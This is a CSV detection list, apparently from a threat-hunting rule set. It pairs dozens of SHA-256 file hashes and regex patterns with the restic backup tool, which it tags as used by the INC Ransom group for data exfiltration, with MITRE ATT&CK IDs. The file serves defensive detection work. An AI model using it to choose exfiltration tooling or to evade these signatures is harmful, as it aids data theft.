"*5dd33ccba1c352f77d7578c5360c6f913092ea2f43ecbf919baf95b563902e2d*",".{0,1000}5dd33ccba1c352f77d7578c5360c6f913092ea2f43ecbf919baf95b563902e2d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5e4ebdeae037d0b3320d9793e91c6fe838a8436047ba030d54a13937a0c195a6*",".{0,1000}5e4ebdeae037d0b3320d9793e91c6fe838a8436047ba030d54a13937a0c195a6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5e7f65847b489875621d1732cfe4e2c46b7ddf3b0ced8e4d5b4e56a4a4a3f2f8*",".{0,1000}5e7f65847b489875621d1732cfe4e2c46b7ddf3b0ced8e4d5b4e56a4a4a3f2f8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*5ff6757d8544719b70bfa25c08f13781421e260b60c9351c88a4898be159dff8*",".{0,1000}5ff6757d8544719b70bfa25c08f13781421e260b60c9351c88a4898be159dff8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*60376b01b334a0cee3a59016f44dde8b336de2b6aa44f1e6e403d307990c47a0*",".{0,1000}60376b01b334a0cee3a59016f44dde8b336de2b6aa44f1e6e403d307990c47a0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*608b6b396eed970d75d8030e8f54c5aa06ba7b2b368ddcd80f114da24a62f6de*",".{0,1000}608b6b396eed970d75d8030e8f54c5aa06ba7b2b368ddcd80f114da24a62f6de.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*612691d7e5100f1714fd4ce7c2ecee2c5b0447d68b480278d54ec58f6c7e2e29*",".{0,1000}612691d7e5100f1714fd4ce7c2ecee2c5b0447d68b480278d54ec58f6c7e2e29.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*613428c4c54093ada2ee1b5c9fe1cccf8bf781bc07fc64071d0e21e55f99a0c1*",".{0,1000}613428c4c54093ada2ee1b5c9fe1cccf8bf781bc07fc64071d0e21e55f99a0c1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*62655adaad7e6118fde3fff73cfc07f73ecd898900b9518c3b7aec5b2ac7623e*",".{0,1000}62655adaad7e6118fde3fff73cfc07f73ecd898900b9518c3b7aec5b2ac7623e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*626ca456089857683c1ab8a5e3eda282837f7ed466ecf1a3c2cdd30e1b309c35*",".{0,1000}626ca456089857683c1ab8a5e3eda282837f7ed466ecf1a3c2cdd30e1b309c35.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*63d13d53834ea8aa4d461f0bfe32a89c70ec47e239b91f029ed10bd88b8f4b80*",".{0,1000}63d13d53834ea8aa4d461f0bfe32a89c70ec47e239b91f029ed10bd88b8f4b80.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*63f982006a02f5dd1b521e16cf203e42bf9a479deab3e89fa88b99e49cb03364*",".{0,1000}63f982006a02f5dd1b521e16cf203e42bf9a479deab3e89fa88b99e49cb03364.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6410bf4446b371c8cc9dab16e0cdc1d0e5f21cfd3750a3a20f4c07c36befd5bc*",".{0,1000}6410bf4446b371c8cc9dab16e0cdc1d0e5f21cfd3750a3a20f4c07c36befd5bc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*66ee25c76d430eea6f787983fe0e79368304ddc69494a4876b012bc3932b1db3*",".{0,1000}66ee25c76d430eea6f787983fe0e79368304ddc69494a4876b012bc3932b1db3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*67003a49d703431238d30117af78874ef72453ba883cc8d2f03e1a4227da54f9*",".{0,1000}67003a49d703431238d30117af78874ef72453ba883cc8d2f03e1a4227da54f9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*67392f0cdf1ea5443b9f625eff4eb55e3630fec77b16e35b01c5b2214023f331*",".{0,1000}67392f0cdf1ea5443b9f625eff4eb55e3630fec77b16e35b01c5b2214023f331.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*680085ce3348940cb67940e3ca7da4ae409ab3169c99592052760ffaf374f9a0*",".{0,1000}680085ce3348940cb67940e3ca7da4ae409ab3169c99592052760ffaf374f9a0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*68200563fb40d6ba3b6f744c919867bfc6fd6106b6317e55853d37f797b783b5*",".{0,1000}68200563fb40d6ba3b6f744c919867bfc6fd6106b6317e55853d37f797b783b5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*683b19a505756b7dc99eca09caf00cd546d474405f08151daef687c890919027*",".{0,1000}683b19a505756b7dc99eca09caf00cd546d474405f08151daef687c890919027.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6880a6b34d856513873c439fc59d8c51c392fe360d5e69577d4e707d6ef77c02*",".{0,1000}6880a6b34d856513873c439fc59d8c51c392fe360d5e69577d4e707d6ef77c02.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*692e70ade358ad4fe19f0cd5fbaf21c3830d0f23c3d4e491a043f6cbc1b5cf59*",".{0,1000}692e70ade358ad4fe19f0cd5fbaf21c3830d0f23c3d4e491a043f6cbc1b5cf59.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6936a522d7d0afd5955bc461cdc63d228aaf33d6cbeb7096e26d7ee90010d954*",".{0,1000}6936a522d7d0afd5955bc461cdc63d228aaf33d6cbeb7096e26d7ee90010d954.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6a794fbb4e3db6e878ee213bfa6b5307136c074fd2214ca242c6ec4609f59785*",".{0,1000}6a794fbb4e3db6e878ee213bfa6b5307136c074fd2214ca242c6ec4609f59785.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6b2fc43f794182788aaa8dae50f1f731c33c5126558e621d693c18455aae92cc*",".{0,1000}6b2fc43f794182788aaa8dae50f1f731c33c5126558e621d693c18455aae92cc.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6b381ea3ed5d0925032ff8d98fe5c443668699983ba7e7b20fddd2b34b5796f0*",".{0,1000}6b381ea3ed5d0925032ff8d98fe5c443668699983ba7e7b20fddd2b34b5796f0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6caae495c78cfaf80bef557903f997db566a5cf3ea08c03d6f09e2c30a6d6d0a*",".{0,1000}6caae495c78cfaf80bef557903f997db566a5cf3ea08c03d6f09e2c30a6d6d0a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6cc2585e1b00bf07cd02b4ee08fb51e88cba155f4a10f753142eb9cc1fcccbc8*",".{0,1000}6cc2585e1b00bf07cd02b4ee08fb51e88cba155f4a10f753142eb9cc1fcccbc8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6cecfa1b5cfba371a6a576e213eeb90f5ea82a91f94fb520cf9160a6526e0ac8*",".{0,1000}6cecfa1b5cfba371a6a576e213eeb90f5ea82a91f94fb520cf9160a6526e0ac8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6d45c62ffaf587bb28e8c24ce0b29187df9589cce0daa6a2ccc02605a3a4f529*",".{0,1000}6d45c62ffaf587bb28e8c24ce0b29187df9589cce0daa6a2ccc02605a3a4f529.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6d795a5f052b3a8cb8e7571629da14f00e92035b7174eb20e32fd1440f68aaff*",".{0,1000}6d795a5f052b3a8cb8e7571629da14f00e92035b7174eb20e32fd1440f68aaff.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6d94fd795439afe13c95030b1b33a606beae24cab986395e374142021c59a7fa*",".{0,1000}6d94fd795439afe13c95030b1b33a606beae24cab986395e374142021c59a7fa.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6df9f806f4cb4001e3722196bfe629c48c2dd39078b33e96db139823db1236e1*",".{0,1000}6df9f806f4cb4001e3722196bfe629c48c2dd39078b33e96db139823db1236e1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6dfa9158c5e57aab361fe9b554369024c16671a134eb34b1604d0e170e184f57*",".{0,1000}6dfa9158c5e57aab361fe9b554369024c16671a134eb34b1604d0e170e184f57.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6ee05f1a72395ef7d41538ef5cc84395d5a168d13e3054a329f0d9f593f80f6d*",".{0,1000}6ee05f1a72395ef7d41538ef5cc84395d5a168d13e3054a329f0d9f593f80f6d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6f252952b482ffac286cfec43774b6f510ad7f47eb7332ce8bbddc1400a91ec3*",".{0,1000}6f252952b482ffac286cfec43774b6f510ad7f47eb7332ce8bbddc1400a91ec3.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6f93ebfce80642e697c1de729ccf6ac3d0d3c7171d4d53e9c69eeaf3417f0d77*",".{0,1000}6f93ebfce80642e697c1de729ccf6ac3d0d3c7171d4d53e9c69eeaf3417f0d77.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6f9d22dde53839cfc4a035c019f2e55fa6a7e7e1ac308060ec312b70e6272611*",".{0,1000}6f9d22dde53839cfc4a035c019f2e55fa6a7e7e1ac308060ec312b70e6272611.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6fab3fa836659c85b97e7a8e514bdbb8d4df186600212a7b5c36cafff7942e38*",".{0,1000}6fab3fa836659c85b97e7a8e514bdbb8d4df186600212a7b5c36cafff7942e38.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*6fae4e720a4f9d3d8b9b635ac161596ab4dce24168dabd75e41ccead6915a454*",".{0,1000}6fae4e720a4f9d3d8b9b635ac161596ab4dce24168dabd75e41ccead6915a454.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*702e44943daae9c094858ed1a8a50e427264a1967535cad0362ce80fdf5acc92*",".{0,1000}702e44943daae9c094858ed1a8a50e427264a1967535cad0362ce80fdf5acc92.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*713eedbc3a86409bb621d853b9fb157c2abe789a9b696796ca0e887e610e8295*",".{0,1000}713eedbc3a86409bb621d853b9fb157c2abe789a9b696796ca0e887e610e8295.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*718883f3de3684d2fb9c8c905de422a5cefac2bc7dac2b0cad1698be61d54cb9*",".{0,1000}718883f3de3684d2fb9c8c905de422a5cefac2bc7dac2b0cad1698be61d54cb9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*72c04c3a683943559166a4ef21e7e35670531d6fdf28d3482298b75d5f736718*",".{0,1000}72c04c3a683943559166a4ef21e7e35670531d6fdf28d3482298b75d5f736718.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*72ce6357beb322ad185e5aec9247665babe206519ec7b0b741b285fdb60375f8*",".{0,1000}72ce6357beb322ad185e5aec9247665babe206519ec7b0b741b285fdb60375f8.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*72fbdbca48fabbc84dfe551bdd3bc2d8d8b96b30ca7a2a71344c4d0878d91d99*",".{0,1000}72fbdbca48fabbc84dfe551bdd3bc2d8d8b96b30ca7a2a71344c4d0878d91d99.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*733c94230677c98424402523a308d03893948c0c89be9920f3ffae73ecbdbc71*",".{0,1000}733c94230677c98424402523a308d03893948c0c89be9920f3ffae73ecbdbc71.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*73cf434ec93e2e20aa3d593dc5eacb221a71d5ae0943ca59bdffedeaf238a9c6*",".{0,1000}73cf434ec93e2e20aa3d593dc5eacb221a71d5ae0943ca59bdffedeaf238a9c6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*743d40286b6e5d2f630e7f6f2e2609ae4b1d99c455c949677549e63495f6f65a*",".{0,1000}743d40286b6e5d2f630e7f6f2e2609ae4b1d99c455c949677549e63495f6f65a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7492c254c277a271e909f2799447aeab7d753a79d0d231b2246cc2c4a2f92738*",".{0,1000}7492c254c277a271e909f2799447aeab7d753a79d0d231b2246cc2c4a2f92738.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*754754c196b3601f2c29758c94000f208a880d45f9b1cc3164123962c97f4ad7*",".{0,1000}754754c196b3601f2c29758c94000f208a880d45f9b1cc3164123962c97f4ad7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*759769fb5f4ddb821039eb7aa68632b0f24625e93fd1298ac30474b6343467db*",".{0,1000}759769fb5f4ddb821039eb7aa68632b0f24625e93fd1298ac30474b6343467db.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*75e67a2bd8883d61ee6d62b37ffea24c92ee446d6443a67b17bbfbf449d17e1b*",".{0,1000}75e67a2bd8883d61ee6d62b37ffea24c92ee446d6443a67b17bbfbf449d17e1b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*76a2c3a4f3a39d91c6b42e2990efc64d878a6b5733ff1b14782e4fcdd50fca70*",".{0,1000}76a2c3a4f3a39d91c6b42e2990efc64d878a6b5733ff1b14782e4fcdd50fca70.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*76da4679b37e969c96e2a243e8b4e94a622be8cf28261e722b7f7a70874a3691*",".{0,1000}76da4679b37e969c96e2a243e8b4e94a622be8cf28261e722b7f7a70874a3691.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*772acdb9d5502a67fabe618d3ebf734879f4f5aaf3249aaea40c2d6d0c81d117*",".{0,1000}772acdb9d5502a67fabe618d3ebf734879f4f5aaf3249aaea40c2d6d0c81d117.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*772bec520912784af836fb89dee9a61763aa3c1c6340753fe1dbbc9a2cfb9ea7*",".{0,1000}772bec520912784af836fb89dee9a61763aa3c1c6340753fe1dbbc9a2cfb9ea7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*77310426d3e2e159f1ef2c8d498f17dc47cbeae310451377a2857f3ce9cd73c0*",".{0,1000}77310426d3e2e159f1ef2c8d498f17dc47cbeae310451377a2857f3ce9cd73c0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*774279ce55ca7b8136f36328ce57a884af2880a8f2097160fd44b646aa8e1429*",".{0,1000}774279ce55ca7b8136f36328ce57a884af2880a8f2097160fd44b646aa8e1429.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*7788d7ab1b6b9e57d30766caaacac880553dc869c3c346c194e5bc83d368a1ba*",".{0,1000}7788d7ab1b6b9e57d30766caaacac880553dc869c3c346c194e5bc83d368a1ba.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*78312276c42ff12162e5afaf6de8586d432022c8bc7551366471b8812703be7e*",".{0,1000}78312276c42ff12162e5afaf6de8586d432022c8bc7551366471b8812703be7e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*783cde05218d88146f9401491cc0431917cb479009f75c3af1e14c4e42bf6a84*",".{0,1000}783cde05218d88146f9401491cc0431917cb479009f75c3af1e14c4e42bf6a84.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*78abad9b589f303f6d9c129ed5ebfe240fbdbdaa5bb0ffec43dacb2991bd526a*",".{0,1000}78abad9b589f303f6d9c129ed5ebfe240fbdbdaa5bb0ffec43dacb2991bd526a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
"*78cdd8994908ebe7923188395734bb3cdc9101477e4163c67e7cc3b8fd3b4bd6*",".{0,1000}78cdd8994908ebe7923188395734bb3cdc9101477e4163c67e7cc3b8fd3b4bd6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z"
